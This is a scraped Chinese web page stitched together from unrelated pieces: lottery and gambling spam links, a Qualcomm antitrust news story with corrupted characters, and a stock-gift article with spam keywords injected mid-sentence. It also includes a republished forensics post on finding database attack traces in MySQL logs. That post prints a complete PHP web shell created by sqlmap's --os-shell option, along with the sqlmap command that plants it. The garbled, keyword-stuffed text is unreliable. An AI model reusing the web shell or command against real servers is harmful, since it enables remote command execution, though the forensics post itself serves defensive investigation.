• GreatNews The Intelligent RSS Reader 2019-08-17
  • 太原11家培训学校承诺规范办学 2019-08-12
  • 消防宣传“下乡赶集” 群众喜获安全礼包 2019-08-07
  • 纹身师晒出新作:用了21小时完成了詹韦连线 2019-08-06
  • 藏医保健常识:保肝护肝有讲究 2019-08-04
  • 习近平:以永远在路上的执着把从严治党引向深入 2019-08-01
  • 武汉市71个中考考点公布 考生下周二下午看考场 2019-08-01
  • 证监会查获一起跨境操纵股市案 涉案金额近33亿元 2019-07-28
  • 中超垫底队不要的外援或赴英超 贵州美女老板很尴尬 2019-07-28
  • 这群艺术家很有爱 3年时间筑起留守儿童音乐“梦想课堂” 2019-07-18
  • 六一记忆:不同的年代 同样的快乐 2019-07-18
  • “李鬼”大学“复刻”正规大学官网 外观一致连校徽都相同 2019-07-14
  • 南方都市报手机客户端·奥一网 2019-07-06
  • 【着力整治群众身边腐败问题】明确任务 强化措施 吕梁全力整治群众身边腐败 2019-07-06
  • 海峡两岸青年交流:一灯引千灯 灯灯相辉映 2019-06-30
  • 常住人口排行榜
    12306相同高铁票
    模特核电站不雅照
    偷吃茶叶蛋被判刑
    景甜首度回应分手
    83版小龙女再婚
    艺术家吴钰璋去世
    周杰伦姚明聚餐
    西安部分小区改名
    刘欢办豹纹派对

    体彩排三走势图带连线:黄义达壁纸

    美国政府关于暂停高通反垄断判决的多学科请求

    河北福利彩票排列七 www.kqtcc.com

        这项裁决将对高通公司的专利授权业务和全球移动电话行业产生巨大影响。高通公司一直在申请暂停这项裁决。

        在腾讯科技之前,高通公司在美国法院遭遇挫折,被授予市场垄断权,要求修改其与外部公司的电信专利许可计划。这项裁决将对高通公司的专利授权业务和全球移动电话行业产生巨大影响。高通公司一直在申请暂停这项裁决。

        据外媒最新消息,事件发生了重大变化。美国司法部(不是本案原告)周二援引美国能源部和国防部的支持,要求联邦上诉法院暂停执行高通公司的反垄断判决。

        负责采购和维护的国防部副部长Ellen M.Lord在提交给第九巡回上诉法院的一份文件中写道:“高通公司是国防部的一家重要公司,无论是在可靠的供应链方面还是在技术创新领导者方面。臀部。在短期内,没有其他公司可以取代高通公司在5G通信领域的关键角色。

        高通公司是连接智能手机和无线数据网络的最大的调制解调器芯片供应商。它还拥有大量电信专利,并向外界提供专利许可。

        今年5月21日,该公司在联邦贸易委员会提起的反垄断诉讼中败诉。美国地区法官Goran Hui裁定,高通公司已采取反竞争专利许可做法,以维持其在移动芯片市场的垄断地位。

        高兰辉法官命令高通公司将其技术授权给生产现代芯片的竞争对手,包括台湾Unifax和华为技术有限公司的子公司Hess。

        高通公司一直试图在上诉期间暂停执行判决。这家总部位于加利福尼亚州圣地亚哥的公司辩称,如果维持这项裁决,它可能会推翻与手机制造商就下一代5G无线数据网络芯片的谈判。

    gao tong gong si yi zhi shi tu zai shang su qi jian zan ting zhi xing pan jue. zhe jia zong bu wei yu jia li fu ni ya zhou sheng di ya ge de gong si bian cheng, ru guo wei chi zhe xiang cai jue, ta ke neng hui tui fan yu shou ji zhi zao shang jiu xia yi dai 5G wu xian shu ju wang luo xin pian de tan pan.

        高通公司还表示,如果它和其他移动电话制造商修改专利许可协议,如果高通公司在未来赢得上诉,将很难再次修改这些专利许可协议。

        据外媒报道,如果高兰辉法官的判决得到严格执行,高通公司在全球智能手机专利的成本将从几美元大幅下降到几美分,手机也将变得更便宜。

        高兰辉法官拒绝中止判决,将案件移送第九巡回上诉法院。

        司法部反垄断部门已要求法官高兰辉在作出裁决前就可能受到的处罚举行额外听证会,但她拒绝这样做。

        在周二提交给法院的一份文件中,司法部的律师称她的裁决是“错误的”,并说她放弃额外听证的决定是“非法的”。

        美国能源部官员也提出申请,暂停高通公司的反垄断判决。美国能源部(U.S.Department of Energy)首席信息官马克斯·埃弗雷特(Max Everett)在一份法庭文件中写道:“国防部在核安全和?;す夷茉春秃嘶∩枋┓矫娴氖姑览涤诎踩拖冉奈尴咄ㄐ?。高通公司是目前和不久的将来美国5G芯片的主要供应商?!?/p>

        美国国防部副部长罗德说,美国国防部“坚信,任何不适当的措施,限制高通公司的技术领导能力、研发投资能力和市场竞争力,即使在短期内,都可能损害国家安全?!?/p>

        需要指出的是,政府对高通公司的反垄断调查和处罚长期以来都不是新闻。在过去的几年里,世界上许多国家和地区的政府都对高通处以不同数额的反垄断???,??钭芏畲?0亿美元。在这些反垄断处罚之后,高通公司逐渐降低了专利费率,并逐步缓和了与手机制造商的关系。(腾讯科技修订/城西)

    当前文章://www.kqtcc.com/887424/93883136.html

    发布时间:16:00:06


    {相关文章}

    6年持股600股将获赠100股 爱尔眼科这波操作非?!?”

        

    ■本报记者何文英

    这两天,爱尔眼科(300015)的投资者们都在忙着打开证券账户确认一件事,看能不能得到公司创始人发的大红包。

    8月14日晚间,爱尔眼科通过其官方公众号“爱尔眼科投资者关系”宣布,公司即将迎来上市十周年纪欧洲极品美女_环亚资讯网念日,为回馈投资者,公司创始人董事长陈邦、总裁李力将向满足“6年600股”条件的个人投资者馈赠100股爱尔眼科股票收益券。

    爱尔眼科董事、副总裁兼董秘吴士君对《证券日报》记者表示:“爱尔眼科自上市以来通过业绩的逐步增长实现了市值的不断攀升,公司也成了市场长期信任的价值投资标的。公司希望通过这次活动倡导长期投资和价值投资的理念,让投资者与上市公司共同成长?!?/p>

    100股“起步价”或超3000元

    怎样才能获得爱尔眼科创始人的大红包呢?公司官方公众号显示,在全国范围内,自2013年8月15日或之前起至2019年8月14日,凡连续持有600股或以上爱尔眼科股票的个人投资者,均可获赠100股爱尔眼科股票收益券。

    获赠者可在今后每年的10月30日提出兑换要求,两位创始人将按照当日收盘价支付100股股票等值的现金,若获赠之后发生股票转赠、红股及累积的现金分红,则累积计算。若10月30日非交易日,则为之后第一个交易日。

    切莫小瞧这100股收益券,按8月15日收盘价31.65元/股计算,100股收益券相当于3165元。并且从爱尔眼科的二级市场长期走势来看,3000多元或仅仅是“起步价”。

    东方财富CHOICE数据显示,爱尔眼科自2009年10月30日上市以来至2019年8月15日,市值从最初的69亿元攀升至目前的980亿元,市值增长了13倍。

    以此次爱尔眼科发放红利的时间条件区间计算,从2013年8月15日至2019年8月14日,公司股票区间涨幅为850%。不考虑分红以及送转股,仅以600股公司股票为计算依据,持有人持股市值已从1922元变成18930元。

    据吴士君透露,之前央视报道过的持有公司股票9年挣了10倍的投资者刘军已经第一时间报名参加了本次赠股活动。刘军在报名后第一时间在朋友圈转发活动图片并附言:“有温度的管理层,9年老股东感觉很温暖!”

    截至发稿,《证券日报》记者从吴士君那了解到:“证券部的电话爆棚了,我们还临时从别的部门借调了一位同事过来帮忙。报名的人很多,但具体符合条件的人数还要通过股票交易单核对才能确认?!倍源?,公司的两位创始人表示:“老铁越多越好,不管多少,全部兑现!”

    “锦上添花”的投资者关系管理

    事实上,爱尔眼科不止这波操作很“6”,其投资者关系管理一直有口皆碑。公司每年的年度股东大会都是济济一堂,会场座位一席难求?;嵘?,管理层均会耐心的解答投资者的各种提问,会场气氛活跃和谐。

    今年5月份召开的公司2018年年度股东大会上,来自湖北宜昌的投资者陈先生已持有爱尔眼科股票9年。他当天还特地带了上小学的女儿参会,希望女儿今后学医,更希望她能成为“爱尔人”?;岷?,陈邦与父女俩合照并表示:“感谢股东们的信任,这将激励爱尔更好地发展,给投资者更好的回报?!?/p>

    这仅仅是冰山一角。据了解,爱尔眼科自2015年起专门设立了官方公众号“爱尔眼科投资者关系”,内容涵盖信息披露、交易信息、投关三大板块。

    公众号保持每个交易日进行更新,在不违反信息披露的原则上,将公司战略部署以及日常经营及时传递给投资者。作为投资者与上市公司沟通的桥梁,董秘吴士君也经常通过电话、邮件、微信等方式与投资者交流,获得业内一致好评。

    不过,吴士君强调:“投资者关系只是锦上添花,市值管理不是无根之木,必须是以扎扎实实的业绩作为基础才能枝繁叶茂?!?/p>

    数据统计,从上市之初的2009年到2018年,爱尔眼科营业收入已从彼时的6殚精竭虑怎么读_环亚资讯网.06亿元飙升至80.09亿元,归属于上市公司股东的净利润从0.92亿元增至10.09亿元,年复合增长率dnf混沌魔石碎片有什么用_环亚资讯网超过30%。

    上市近10年来,爱尔眼科通过内生外延不断发荣滋长,从成立之初的只有4家医院到目前超过300家医院,已经成长为横跨亚欧美的全球大型眼科集团。

    基于此,确认 英文_环亚资讯网爱尔眼科市值从上市之初的69亿元攀升至目前的980亿元,市值增长了13倍。此外,长期持特种兵之霹雳火吴京_环亚资讯网有的投资青岛e都市_环亚资讯网者除了收获丰厚的资本利得外,还能享受到公司的豪气分红。

    据统计,爱尔眼科自2009年上市以来年年分红,累计分红金额已达到17.88亿元,已经超过IPO募集资金总额。

    值得关注的是,爱尔眼科即将迎来上市十周年,未来是否仍能延续上一个十年的辉煌?对此,陈邦表示,2019年是爱尔眼科二次创业的元年,新十年的起点。他认为:“公司只是个18岁的少年,眼科行业未来5至10年内都不会触及天花板?!?/p>

        

        

        

        

    (责任编辑:李佳佳 HN153)

        

        

        

        

        

    2019-06-20 3,995

    常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等。对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景及追溯攻击源。

    0x01 Mysql日志分析

    general query log能记录成功连接和每次执行的查询,我们可以将它用作安全布防的一部分,为故障分析或黑客事件后的调查提供依据。

    1、查看log配置信息

    show variables like '%general%';

    2、开启日志

    SET GLOBAL general_log = 'On';

    3、指定日志文件路径

    SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';

    比如,当我访问 /test.php?id=1,此时我们得到这样的日志:

    190604 14:46:14       14 Connect    [email protected] on
                          14 Init DB    test   
                          14 Query    SELECT * FROM admin WHERE id = 1     
                          14 Quit

    我们按列来解析一下:

    第一列:Time,时间列,前面一个是日期,后面一个是小时和分钟,有一些不显示的原因是因为这些sql语句几乎是同时执行的,所以就不另外记录时间了。
    第二列:Id,就是show processlist出来的第一列的线程ID,对于长连接和一些比较耗时的sql语句,你可以精确找出究竟是那一条那一个线程在运行。
    第三列:Command,操作类型,比如Connect就是连接数据库,Query就是查询数据库(增删查改都显示为查询),可以特定过虑一些操作。
    第四列:Argument,详细信息,例如 Connect    [email protected] on 意思就是连接数据库,如此类推,接下面的连上数据库之后,做了什么查询的操作。

    0x02 登录成功/失败

    我们来做个简单的测试吧,使用我以前自己开发的弱口令工具来扫一下,字典设置比较小,2个用户,4个密码,共8组。

    MySQL中的log记录是这样子:

    Time                 Id        Command         Argument
    190601 22:03:20     98 Connect  [email protected] on
            98 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
            103 Connect  [email protected] on       
            103 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            104 Connect  [email protected] on       
            104 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Connect  [email protected] on       
            101 Connect  [email protected] on       
            101 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)       
            99 Connect  [email protected] on        
            99 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
            105 Connect  [email protected] on       
            105 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Query  set autocommit=0      
            102 Connect  [email protected] on       
            102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Quit


    你知道在这个口令猜解过程中,哪个是成功的吗?

    利用爆破工具,一个口令猜解成功的记录是这样子的:

    190601 22:03:20     100 [email protected] on
       100 Queryset autocommit=0   
       100 Quit


    但是,如果你是用其他方式,可能会有一点点不一样的哦。

    Navicat for MySQL登录:

    190601 22:14:07  106 [email protected] on         
             106 QuerySET NAMES utf8
             106 QuerySHOW VARIABLES LIKE 'lower_case_%'         
             106 QuerySHOW VARIABLES LIKE 'profiling'         
             106 QuerySHOW DATABASES

    命令行登录:

    190601 22:17:25  111 [email protected] on
             111 Queryselect @@version_comment limit 1
             190601 22:17:56  111 Quit

    这个差别在于,不同的数据库连接工具,它在连接数据库初始化的过程中是不同的。通过这样的差别,我们可以简单判断出用户是通过连接数据库的方式。

    另外,不管你是爆破工具、Navicat for MySQL、还是命令行,登录失败都是一样的记录。

    登录失败的记录:

    102 Connect  [email protected] on 
    102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)

    利用shell命令进行简单的分析:

    有哪些IP在爆破?

    grep  "Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr
         27 192.168.204.1

    爆破用户名字典都有哪些?

    grep  "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -nr     13 mysql     12 root      1 root      1 mysql


    在日志分析中,特别需要注意一些敏感的操作行为,比如删表、备库,读写文件等。

    关键词:drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。
    敏感数据库表:SELECT * from mysql.user、SELECT * from mysql.func


    0x03 SQL注入入侵痕迹

    在利用SQL注入漏洞的过程中,我们会尝试利用sqlmap的--os-shell参数取得shell,如操作不慎,可能留下一些sqlmap创建的临时表和自定义函数。我们先来看一下sqlmap os-shell参数的用法以及原理:

    1、构造一个SQL注入点,开启Burp监听8080端口

    sqlmap.py  -u //192.168.204.164/sql.php?id=1 --os-shell --proxy=//127.0.0.1:8080

    HTTP通讯过程如下:

    创建了一个临时文件tmpbwyov.php,通过访问这个木马执行系统命令,并返回到页面展示。

    tmpbwyov.php:

    <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);[email protected]_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>`

    创建了一个临时表sqlmapoutput,调用存储过程执行系统命令将数据写入临时表,然后取临时表中的数据展示到前端。

    通过查看网站目录中最近新建的可疑文件,可以判断是否发生过sql注入漏洞攻击事件。


    检查方法:

    1、检查网站目录下,是否存在一些木马文件:

    2、检查是否有UDF提权、MOF提权痕迹

    检查目录是否有异常文件

    mysqllibpluginc:/windows/system32/wbem/mof/

    检查函数是否删除

    select * from mysql.func

    3、结合web日志分析。


    本文转自公众号:Bypass

    Tags: 、、、、、、、、、、、、、、
    评论  (0)
    快来写下你的想法吧!

    Bypass007

    文章数:22 积分: 78

    一个网络安全爱好者,对技术有着偏执狂一样的追求。

    安全问答社区

    脉搏官方公众号

    活动日程

  • GreatNews The Intelligent RSS Reader 2019-08-17
  • 太原11家培训学校承诺规范办学 2019-08-12
  • 消防宣传“下乡赶集” 群众喜获安全礼包 2019-08-07
  • 纹身师晒出新作:用了21小时完成了詹韦连线 2019-08-06
  • 藏医保健常识:保肝护肝有讲究 2019-08-04
  • 习近平:以永远在路上的执着把从严治党引向深入 2019-08-01
  • 武汉市71个中考考点公布 考生下周二下午看考场 2019-08-01
  • 证监会查获一起跨境操纵股市案 涉案金额近33亿元 2019-07-28
  • 中超垫底队不要的外援或赴英超 贵州美女老板很尴尬 2019-07-28
  • 这群艺术家很有爱 3年时间筑起留守儿童音乐“梦想课堂” 2019-07-18
  • 六一记忆:不同的年代 同样的快乐 2019-07-18
  • “李鬼”大学“复刻”正规大学官网 外观一致连校徽都相同 2019-07-14
  • 南方都市报手机客户端·奥一网 2019-07-06
  • 【着力整治群众身边腐败问题】明确任务 强化措施 吕梁全力整治群众身边腐败 2019-07-06
  • 海峡两岸青年交流:一灯引千灯 灯灯相辉映 2019-06-30
  • 浙江大乐透走势图基本 彩经网旧版七乐彩走势图代选号的 6场半全场赛果 广东36选7彩票开奖查询结果 重庆百变王牌同步 体彩6场半全场怎么玩 广西快三开奖结果历史 浙江快乐彩票怎么查 三全中是什么意思 新疆25选7今日开奖号码 福建11选五走势图 博雅德州扑克 今晚开什么特马 好运玩卡 奖结果历史记录